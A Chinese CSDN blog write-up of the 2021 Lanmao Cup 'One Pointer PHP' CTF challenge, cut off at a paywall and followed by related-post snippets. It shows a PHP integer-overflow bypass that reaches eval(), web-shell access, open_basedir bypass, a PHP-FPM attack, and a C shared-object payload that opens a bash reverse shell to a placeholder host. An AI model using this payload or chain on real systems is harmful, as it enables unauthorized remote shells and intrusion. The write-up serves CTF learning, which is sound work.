[蓝帽杯 2021]One Pointer PHP

于 2022-08-18 01:06:22 发布
阅读量217 收藏 1
点赞数
分类专栏: web安全 CTF 文章标签: php 开发语言 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/snowlyzz/article/details/126396994
版权
本文详细介绍了参与蓝帽杯2021过程中遇到的PHP相关安全问题,包括FPM未授权攻击、构造FTP服务器进行恶意Fastcgi请求,以及如何在权限受限的情况下进行提权操作获取flag。作者分享了踩坑经验,如通过反序列化技巧触发RCE,利用open_basedir限制的绕过方法,以及通过FTP和恶意SO文件反弹shell。
摘要由CSDN通过智能技术生成

这题弄了我3天时间,一开始是弹不了shell,以为是vps问题,换了个vps还是不行,又检查了pyload,又改了 so文件还是不行,最后反复检查 也算是彻底了解了这道题的考点。

开始吧。

源码:

add_api.php
 
<?php
show_source(__FILE__);
include "user.php";
if($user=unserialize($_COOKIE["data"])){
	$count[++$user->count]=1;
	if($count[]=1){
		$user->count+=1;
		setcookie("data",serialize($user));
	}else{
		eval($_GET["backdoor"]);
	}
}else{
	$user=new User;
	$user->count=1;
	setcookie("data",serialize($user));
}
?>
user.php
 
<?php
class User{
	public $count;
}
?>

代码add_app.php包含user.php  将cookie 中的data 反序列化为 $user对象。将user 中 的count +1作为 count的下表 并给此元素赋值为1,然后进行if判断count[]=1的意思就是给此数组末尾添加一个元素,值为1。那这里第一个考点就已经出来了,倘若我将count设为最大值-1的数字,那么在经历过自增后,该count为最大值,再进行$count[]=1操作,由于数组已经达到最大值了,数组末尾无法添加元素,所以此操作出错,执行else语句。我们便可以RCE。不同的操作系统PHP最大值是不一样的,32位上为2147483647,64位上为9223372036854775807,所以这里我们应该设置count为9223372036854775806,写个序列化脚本生成序列化字符串
 

<?php
    class User
    {
        public $count=9223372036854775806;
    }
    echo serialize(new User);
?>

//O:4:"User":1:{s:5:"count";i:9223372036854775806;}
//O%3A4%3A%22User%22%3A1%3A%7Bs%3A5%3A%22count%22%3Bi%3A9223372036854775806%3B%7D

绕过之后,我们就可以进行到eval 函数。

传一个backdoor吧。

 

 

既然能看到phpinfo()了 。那么我们连一下蚁剑。

 

 Cookie记得传data  不然连不上去

 进到里面flag 是无法直接读取的,

 猜测是没有权限,继续往下再分析一下 phpinfo.

 

 果然是设置了open_basedir,我们需要进行绕过,如果对这个不熟悉的话,看看我之前写的博客。浅谈绕过open_basedir 的几种用法_snowlyzz的博客-CSDN博客

因为open_basedir 对目录又限制,所以我们只能对/var/www/html下的文件进行操作。但是我试了下,可以访问php.ini 配置文件:/user/local/etc/php/php.ini ,这种linux的文件路径和windows的是不一样的。

 这个异常的so文件,看其他师傅说是可以pwn。但是我不会 于是再看看nginx的配置文件。

路径:/etc/nginx/sites-enabled/default

 发现他是开启了 fastcgi ,这里的考点应该是利用FPM未授权漏洞对其攻击。

FPM未授权攻击。

先在linux 构造恶意的 so 文件,最好先更新一下gcc:linux安装gcc命令步骤(centos安装gcc命令)_sunsineq的博客-CSDN博客_gcc安装命令

在linux 创建 一个  . c 文件

#define _GNU_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
 
__attribute__ ((__constructor__)) void preload (void){
    system("bash -c 'bash -i >& /dev/tcp/your_IP/7777 0>&1'");
}

 然后:

gcc payload.c -fPIC -shared -o payload.so

 进行编译文件。

然后使用xftp 把你vps 下的 so 文件传输到你wiindows 上,然后在蚁剑上传到题目环境的/var/www/html/目录下

最低0.47元/天 解锁文章
snowlyzz
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
蓝帽杯one_Pointer_php writeup
05-10
蓝帽杯one_Pointer_php writeup
[2021 蓝帽杯] One Pointer PHP
qq_64201116的博客
09-01 761
吃不到反弹shell?为什么吃不到!!一套流程帮你吃到你的shell!!!
[BUUCTF][蓝帽杯 2021]One Pointer PHP
cosmoslin的博客
11-15 1731
考点 PHP数组溢出 绕过open_basedir 攻击php-fpm绕过disable functions Suid提权 源码 user.php <?php class User{ public $count; } ?> add_api.php <?php include "user.php"; if($user=unserialize($_COOKIE["data"])){ $count[++$user->count]=1; if($count[]=1){ $user
【电子取证】网站取证(第六届”蓝帽杯“全国大学生网络安全技能大赛)
07-12
在第六届“蓝帽杯”全国大学生网络安全技能大赛中,参赛者可能需要掌握这项技术来解决实际问题。电子取证,也被称为数字取证,是指在法律允许的范围内,对电子设备中的数据进行收集、分析、验证,以获取与法律纠纷或...
【MISC】domainhacker2(第六届”蓝帽杯“全国大学生网络安全技能大赛)
07-11
【MISC】domainhacker2 是一场比赛项目,源自第六届"蓝帽杯"全国大学生网络安全技能大赛。这个比赛旨在提升大学生在网络安全领域的实践能力和理论知识,促进网络安全技术的学习与交流。从提供的文件名来看,我们可以...
第五届蓝帽杯_2021_chall
05-13
第五届蓝帽杯_2021_chall,沙盒机制的pwn题。
【电子取证】手机取证(第六届”蓝帽杯“全国大学生网络安全技能大赛).7z.001
07-13
第六届”蓝帽杯“全国大学生网络安全技能大赛
[蓝帽杯 2021]One Pointer PHP【溢出+FPM】
D.MIND 的博客
05-20 897
文章目录整型溢出`chdir()`、 `ini_set()`绕过open_basedir读取nginx配置文件方法一方法二: 整型溢出 利用64位系统的整型最大值溢出,这里令count=9223372036854775806,当再加2时就会提示溢出警告,从而绕过。 <?php class User{ public $count=9223372036854775806; } echo urlencode(serialize(new User())); ?> //O%3A4%3A%22User%
CTF one_Pointer_php 2021 蓝帽杯 WriteUp
baynk的博客
05-10 1240
两周前做的,弄了一会没时间就放下了,我当时以为我差一点,结果真的差亿点。。。 今天在BUUCTF中看到了这个题的复现,特来学习一波。 0x01 PHP审计 之前看到人家发的是张火炬,这次打开却是个广告了。。不过无所谓,给了源代码就成,分别是user.php和add_api.php。 ### user.php <?php class User{ public $count; } ?> ### add_api.php <?php include "user.php"; if($use
蓝帽杯2021 One Pointer PHP
Tajang的大千世界
11-23 3797
第一次打FPM/FastCGI的题,实际上也是第一次接触打中间件的题,刚开始是在陇原战“疫”碰到了一道类似的题,也是改编的这道,为了更好地复现这道题,理解这道题,我去把Fastcgi 协议分析与 PHP-FPM 攻击方法都看了几遍。攻击的实操部分,本来想着复现,但那个鬼环境一直差点意思。这里不得不提中国网安界大神——phith0n,P神开创的vulhub确实帮了国内外网络安全学习者的大忙,让安全研究者更加专注于漏洞原理本身,而不是忙于搭建复杂的漏洞环境。但不幸的事,这个洞的环境坏了,问了P神说官网要下架,让
----已搬运----[蓝帽杯 2021]One Pointer PHP --- PHP数组溢出,Fastcgi FTP - SSRF 攻击 php-fpm - SUID提权 proc
Zero_Adam的博客
06-11 814
二、学到的&&不足: 三、学习WP: 给了源码,两个PHP文件: user.php: <?php class User{ public $count; } ?> add_api.php <?php include "user.php"; if($user=unserialize($_COOKIE["data"])){ $count[++$user->count]=1; // 数组$count的第几个属性赋值为1 if($count[]=1){ $us
蓝帽杯 One pointer php
weixin_45805993的博客
11-12 2194
add_api.php <?php include "user.php"; if($user=unserialize($_COOKIE["data"])){ $count[++$user->count]=1; if($count[]=1){ $user->count+=1; setcookie("data",serialize($user)); }else{ eval($_GET["backdoor"]); }
2021第五届蓝帽杯初赛部分题目wp
Dream的博客
04-30 1412
题目目录WEBBall_siginMISC冬奥会_is_coming WEB Ball_sigin MISC 冬奥会_is_coming 这届蓝帽杯难度挺大的,这得吐槽一下冬奥会_is_coming这题MISC题,实在太绕了呀… Ball_sigin 签到题,在手机端手感会好些,完成滑雪游戏即可拿到flag 冬奥会_is_coming 下载附件,首先拿到一张图片 用kali自带的binwalk工具分离图片得到一个rar压缩包,有一个提示和一个音频文件 这里直接cat查看mp3文件,在最底部有一串表情
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值